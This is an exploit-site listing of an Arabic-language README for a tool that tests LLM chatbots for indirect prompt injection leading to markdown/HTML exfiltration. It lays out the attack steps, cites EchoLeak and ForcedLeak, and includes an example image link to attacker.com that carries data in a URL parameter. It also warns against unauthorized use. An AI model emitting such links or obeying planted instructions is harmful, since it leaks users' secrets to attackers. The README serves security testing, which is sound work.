Sploitus

Exploit for markdown-exfil-tester

kitploit · 2026-09-02

Exploit Code

MARKDOWN24 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TRERB-MARKDOWN-EXFIL-TESTER
# فاحص تسريب ماركداون من فالتيك

فاحص الصندوق الأسود لـ **حقن التعليمات غير المباشر المؤدي إلى تسريب ماركداون / HTML** في روبوتات المحادثة المدعومة بنماذج اللغة الكبيرة (LLM). هذه هي فئة الثغرة التي أثرت على Microsoft 365 Copilot (CVE-2025-32711، المعروف باسم EchoLeak) وChatGPT (تصحيح فبراير 2026 من OpenAI) وSalesforce (ForcedLeak). النمط:

  1. يزرع المهاجم ماركداون أو HTML في محتوى سيقرأه النموذج اللغوي (مستندات، تذاكر دعم، طلبات سحب، صفحات ويب مدمجة، مصادر RAG).
  2. يصدر النموذج اللغوي ماركداون مثل `![](http://attacker.com/?data=%D8%B3%D8%B1)` في رده.
  3. تقوم واجهة روبوت المحادثة بعرض الماركداون، ويقوم المتصفح بجلب عنوان المهاجم، وتتسرب الأسرار عبر معامل عنوان URL في كل عرض.



الأدوات الحالية (Garak, Augustus, Promptfoo) ممتازة في اختبار حقن طبقة النص ولكنها **لا تغلق واجهة العرض — "هل قامت واجهتك الأمامية بالفعل بجلب عنوان المهاجم؟"** هذه هي الثغرة الحقيقية. هذه الأداة تسد هذه الفجوة.

> `npx valtik-markdown-exfil-tester https://your-chatbot.example.com`

## إذن مطلوب

**لا تقم بتشغيل هذه الأداة ضد روبوتات محادثة لا تملكها أو لديك إذن كتابي صريح لاختبارها.** تشغيل هذه الأداة ضد روبوت محادثة تابع لجهة خارجية بدون إذن يعد على الأرجح انتهاكًا لشروط استخدام الخدمة وقد يكون غير قانوني في بلدك (CFAA في الولايات المتحدة، قانون إساءة استخدام الحاسوب في المملكة المتحدة، قوانين مماثلة في الاتحاد الأوروبي).

حالات الاستخدام المشروعة:

  * اختبار اختراق روبوت محادثة تمتلكه مؤسستك.
  * اختبار روبوت محادثة ضمن نطاق اتفاقية مرخصة (نطاق العمل المكتوب).
  * اختبار هدف ضمن برنامج مكافآت الثغرات الذي تسمح سياسته صراحةً بهذا النوع من الاختبار (اقرأ السياسة أولاً — العديد من برامج LLM تقيد حقن التعليمات الثقيل).